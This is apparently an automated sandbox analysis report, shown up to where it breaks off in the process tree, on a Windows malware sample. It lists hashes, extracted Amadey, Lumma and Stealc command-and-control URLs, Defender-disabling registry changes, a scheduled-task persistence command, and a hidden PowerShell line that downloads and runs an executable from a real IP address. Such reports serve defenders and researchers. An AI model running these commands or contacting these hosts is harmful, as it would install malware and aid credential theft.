Analysis
-
max time kernel
144s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
30/03/2025, 13:42
Static task
static1
Behavioral task
behavioral1
Sample
2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win10v2004-20250314-en
General
-
Target
2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
-
Size
938KB
-
MD5
0e4ac18b2224b5d46bfb6a68417a0104
-
SHA1
38922c092ce214d8f87586f7ed13d68814a95057
-
SHA256
31bd1ef59c8715bdd8a5bf2e8231e43f9156d1b71901061b552dbbd37550960a
-
SHA512
6ffa7135c8a61329be36dbfca51c8f74b75e8ab8596d8407c1ea628f27b8b9a3e862ffdcfb1de40379b91ca33109bc0f2b9b57cffe3735649f9c8b86796e8629
-
SSDEEP
24576:/qDEvCTbMWu7rQYlBQcBiT6rprG8a0ou:/TvC/MTQYxsWR7a0o
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://rodformi.run/aUosoz
https://metalsyo.digital/opsa
https://ironloxp.live/aksdd
https://navstarx.shop/FoaJSi
https://starcloc.bet/GOksAo
https://advennture.top/GKsiio
https://targett.top/dsANGt
https://spacedbv.world/EKdlsk
https://galxnetb.today/GsuIAo
https://esccapewz.run/ANSbwqy
https://travewlio.shop/ZNxbHi
https://touvrlane.bet/ASKwjq
https://sighbtseeing.shop/ASJnzh
https://holidamyup.today/AOzkns
https://mtriplooqp.world/APowko
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/4772-442-0x00000000006F0000-0x0000000000B4E000-memory.dmp healer behavioral2/memory/4772-443-0x00000000006F0000-0x0000000000B4E000-memory.dmp healer behavioral2/memory/4772-556-0x00000000006F0000-0x0000000000B4E000-memory.dmp healer -
Healer family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" 72ed6b8663.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 72ed6b8663.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 72ed6b8663.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 72ed6b8663.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 72ed6b8663.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 72ed6b8663.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 72ed6b8663.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 72ed6b8663.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications 72ed6b8663.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" 72ed6b8663.exe -
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 84687d1682.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ bfdff198ba.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 72ed6b8663.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 98d889d34a.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempV1RKOVGGQFSGWA19SQFEGYV4H5DNGY7I.EXE -
Blocklisted process makes network request 1 IoCs
flow pid Process 14 2120 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2120 powershell.exe -
Downloads MZ/PE file 5 IoCs
flow pid Process 58 3400 rapes.exe 58 3400 rapes.exe 58 3400 rapes.exe 58 3400 rapes.exe 14 2120 powershell.exe -
Checks BIOS information in registry 2 TTPs 16 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 98d889d34a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempV1RKOVGGQFSGWA19SQFEGYV4H5DNGY7I.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 72ed6b8663.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 98d889d34a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 84687d1682.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion bfdff198ba.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempV1RKOVGGQFSGWA19SQFEGYV4H5DNGY7I.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 84687d1682.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion bfdff198ba.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 72ed6b8663.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation TempV1RKOVGGQFSGWA19SQFEGYV4H5DNGY7I.EXE Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation rapes.exe -
Executes dropped EXE 9 IoCs
pid Process 904 TempV1RKOVGGQFSGWA19SQFEGYV4H5DNGY7I.EXE 3400 rapes.exe 1808 rapes.exe 1868 84687d1682.exe 1752 bfdff198ba.exe 4744 020efe7ce4.exe 4772 72ed6b8663.exe 5772 98d889d34a.exe 5268 rapes.exe -
Identifies Wine through registry keys 2 TTPs 8 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine 72ed6b8663.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine 98d889d34a.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine TempV1RKOVGGQFSGWA19SQFEGYV4H5DNGY7I.EXE Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine 84687d1682.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine bfdff198ba.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 72ed6b8663.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 72ed6b8663.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bfdff198ba.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10381670101\\bfdff198ba.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\020efe7ce4.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10381680101\\020efe7ce4.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\72ed6b8663.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10381690101\\72ed6b8663.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\84687d1682.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10381660101\\84687d1682.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0008000000024235-91.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
pid Process 904 TempV1RKOVGGQFSGWA19SQFEGYV4H5DNGY7I.EXE 3400 rapes.exe 1808 rapes.exe 1868 84687d1682.exe 1752 bfdff198ba.exe 4772 72ed6b8663.exe 5772 98d889d34a.exe 5268 rapes.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job TempV1RKOVGGQFSGWA19SQFEGYV4H5DNGY7I.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 19 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 020efe7ce4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 72ed6b8663.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 98d889d34a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempV1RKOVGGQFSGWA19SQFEGYV4H5DNGY7I.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bfdff198ba.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 020efe7ce4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 020efe7ce4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 84687d1682.exe -
Checks processor information in registry 2 TTPs 18 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe -
Kills process with taskkill 5 IoCs
pid Process 3836 taskkill.exe 2564 taskkill.exe 1712 taskkill.exe 3304 taskkill.exe 4752 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2604 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 33 IoCs
pid Process 2120 powershell.exe 2120 powershell.exe 904 TempV1RKOVGGQFSGWA19SQFEGYV4H5DNGY7I.EXE 904 TempV1RKOVGGQFSGWA19SQFEGYV4H5DNGY7I.EXE 3400 rapes.exe 3400 rapes.exe 1808 rapes.exe 1808 rapes.exe 1868 84687d1682.exe 1868 84687d1682.exe 1868 84687d1682.exe 1868 84687d1682.exe 1868 84687d1682.exe 1868 84687d1682.exe 1752 bfdff198ba.exe 1752 bfdff198ba.exe 4744 020efe7ce4.exe 4744 020efe7ce4.exe 4772 72ed6b8663.exe 4772 72ed6b8663.exe 4744 020efe7ce4.exe 4744 020efe7ce4.exe 4772 72ed6b8663.exe 4772 72ed6b8663.exe 4772 72ed6b8663.exe 5772 98d889d34a.exe 5772 98d889d34a.exe 5772 98d889d34a.exe 5772 98d889d34a.exe 5772 98d889d34a.exe 5772 98d889d34a.exe 5268 rapes.exe 5268 rapes.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
description pid Process Token: SeDebugPrivilege 2120 powershell.exe Token: SeDebugPrivilege 3836 taskkill.exe Token: SeDebugPrivilege 2564 taskkill.exe Token: SeDebugPrivilege 1712 taskkill.exe Token: SeDebugPrivilege 3304 taskkill.exe Token: SeDebugPrivilege 4752 taskkill.exe Token: SeDebugPrivilege 3656 firefox.exe Token: SeDebugPrivilege 3656 firefox.exe Token: SeDebugPrivilege 4772 72ed6b8663.exe -
Suspicious use of FindShellTrayWindow 33 IoCs
pid Process 3464 2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 3464 2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 3464 2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 904 TempV1RKOVGGQFSGWA19SQFEGYV4H5DNGY7I.EXE 4744 020efe7ce4.exe 4744 020efe7ce4.exe 4744 020efe7ce4.exe 4744 020efe7ce4.exe 4744 020efe7ce4.exe 4744 020efe7ce4.exe 4744 020efe7ce4.exe 3656 firefox.exe 4744 020efe7ce4.exe 3656 firefox.exe 3656 firefox.exe 3656 firefox.exe 3656 firefox.exe 3656 firefox.exe 3656 firefox.exe 3656 firefox.exe 3656 firefox.exe 3656 firefox.exe 3656 firefox.exe 3656 firefox.exe 3656 firefox.exe 3656 firefox.exe 3656 firefox.exe 3656 firefox.exe 3656 firefox.exe 4744 020efe7ce4.exe 3656 firefox.exe 4744 020efe7ce4.exe 4744 020efe7ce4.exe -
Suspicious use of SendNotifyMessage 26 IoCs
pid Process 3464 2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 3464 2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 3464 2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 4744 020efe7ce4.exe 4744 020efe7ce4.exe 4744 020efe7ce4.exe 4744 020efe7ce4.exe 4744 020efe7ce4.exe 4744 020efe7ce4.exe 4744 020efe7ce4.exe 4744 020efe7ce4.exe 3656 firefox.exe 3656 firefox.exe 3656 firefox.exe 3656 firefox.exe 3656 firefox.exe 3656 firefox.exe 3656 firefox.exe 3656 firefox.exe 3656 firefox.exe 3656 firefox.exe 3656 firefox.exe 3656 firefox.exe 4744 020efe7ce4.exe 4744 020efe7ce4.exe 4744 020efe7ce4.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3656 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3464 wrote to memory of 2248 3464 2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 3464 wrote to memory of 2248 3464 2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 3464 wrote to memory of 2248 3464 2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 3464 wrote to memory of 1956 3464 2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 3464 wrote to memory of 1956 3464 2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 3464 wrote to memory of 1956 3464 2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 2248 wrote to memory of 2604 2248 cmd.exe 89 PID 2248 wrote to memory of 2604 2248 cmd.exe 89 PID 2248 wrote to memory of 2604 2248 cmd.exe 89 PID 1956 wrote to memory of 2120 1956 mshta.exe 92 PID 1956 wrote to memory of 2120 1956 mshta.exe 92 PID 1956 wrote to memory of 2120 1956 mshta.exe 92 PID 2120 wrote to memory of 904 2120 powershell.exe 111 PID 2120 wrote to memory of 904 2120 powershell.exe 111 PID 2120 wrote to memory of 904 2120 powershell.exe 111 PID 904 wrote to memory of 3400 904 TempV1RKOVGGQFSGWA19SQFEGYV4H5DNGY7I.EXE 112 PID 904 wrote to memory of 3400 904 TempV1RKOVGGQFSGWA19SQFEGYV4H5DNGY7I.EXE 112 PID 904 wrote to memory of 3400 904 TempV1RKOVGGQFSGWA19SQFEGYV4H5DNGY7I.EXE 112 PID 3400 wrote to memory of 1868 3400 rapes.exe 114 PID 3400 wrote to memory of 1868 3400 rapes.exe 114 PID 3400 wrote to memory of 1868 3400 rapes.exe 114 PID 3400 wrote to memory of 1752 3400 rapes.exe 115 PID 3400 wrote to memory of 1752 3400 rapes.exe 115 PID 3400 wrote to memory of 1752 3400 rapes.exe 115 PID 3400 wrote to memory of 4744 3400 rapes.exe 116 PID 3400 wrote to memory of 4744 3400 rapes.exe 116 PID 3400 wrote to memory of 4744 3400 rapes.exe 116 PID 4744 wrote to memory of 3836 4744 020efe7ce4.exe 117 PID 4744 wrote to memory of 3836 4744 020efe7ce4.exe 117 PID 4744 wrote to memory of 3836 4744 020efe7ce4.exe 117 PID 4744 wrote to memory of 2564 4744 020efe7ce4.exe 119 PID 4744 wrote to memory of 2564 4744 020efe7ce4.exe 119 PID 4744 wrote to memory of 2564 4744 020efe7ce4.exe 119 PID 4744 wrote to memory of 1712 4744 020efe7ce4.exe 121 PID 4744 wrote to memory of 1712 4744 020efe7ce4.exe 121 PID 4744 wrote to memory of 1712 4744 020efe7ce4.exe 121 PID 4744 wrote to memory of 3304 4744 020efe7ce4.exe 123 PID 4744 wrote to memory of 3304 4744 020efe7ce4.exe 123 PID 4744 wrote to memory of 3304 4744 020efe7ce4.exe 123 PID 4744 wrote to memory of 4752 4744 020efe7ce4.exe 125 PID 4744 wrote to memory of 4752 4744 020efe7ce4.exe 125 PID 4744 wrote to memory of 4752 4744 020efe7ce4.exe 125 PID 4744 wrote to memory of 392 4744 020efe7ce4.exe 127 PID 4744 wrote to memory of 392 4744 020efe7ce4.exe 127 PID 392 wrote to memory of 3656 392 firefox.exe 128 PID 392 wrote to memory of 3656 392 firefox.exe 128 PID 392 wrote to memory of 3656 392 firefox.exe 128 PID 392 wrote to memory of 3656 392 firefox.exe 128 PID 392 wrote to memory of 3656 392 firefox.exe 128 PID 392 wrote to memory of 3656 392 firefox.exe 128 PID 392 wrote to memory of 3656 392 firefox.exe 128 PID 392 wrote to memory of 3656 392 firefox.exe 128 PID 392 wrote to memory of 3656 392 firefox.exe 128 PID 392 wrote to memory of 3656 392 firefox.exe 128 PID 392 wrote to memory of 3656 392 firefox.exe 128 PID 3656 wrote to memory of 4368 3656 firefox.exe 129 PID 3656 wrote to memory of 4368 3656 firefox.exe 129 PID 3656 wrote to memory of 4368 3656 firefox.exe 129 PID 3656 wrote to memory of 4368 3656 firefox.exe 129 PID 3656 wrote to memory of 4368 3656 firefox.exe 129 PID 3656 wrote to memory of 4368 3656 firefox.exe 129 PID 3656 wrote to memory of 4368 3656 firefox.exe 129 PID 3656 wrote to memory of 4368 3656 firefox.exe 129 PID 3656 wrote to memory of 4368 3656 firefox.exe 129 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3464 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn LLSzdmaekcr /tr "mshta C:\Users\Admin\AppData\Local\Temp\q4WTMsVnl.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2248 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn LLSzdmaekcr /tr "mshta C:\Users\Admin\AppData\Local\Temp\q4WTMsVnl.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2604
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\q4WTMsVnl.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1956 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'V1RKOVGGQFSGWA19SQFEGYV4H5DNGY7I.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2120 -
C:\Users\Admin\AppData\Local\TempV1RKOVGGQFSGWA19SQFEGYV4H5DNGY7I.EXE"C:\Users\Admin\AppData\Local\TempV1RKOVGGQFSGWA19SQFEGYV4H5DNGY7I.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:904 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3400 -
C:\Users\Admin\AppData\Local\Temp\10381660101\84687d1682.exe"C:\Users\Admin\AppData\Local\Temp\10381660101\84687d1682.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1868
-
-
C:\Users\Admin\AppData\Local\Temp\10381670101\bfdff198ba.exe"C:\Users\Admin\AppData\Local\Temp\10381670101\bfdff198ba.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1752
-
-
C:\Users\Admin\AppData\Local\Temp\10381680101\020efe7ce4.exe"C:\Users\Admin\AppData\Local\Temp\10381680101\020efe7ce4.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4744 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3836
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
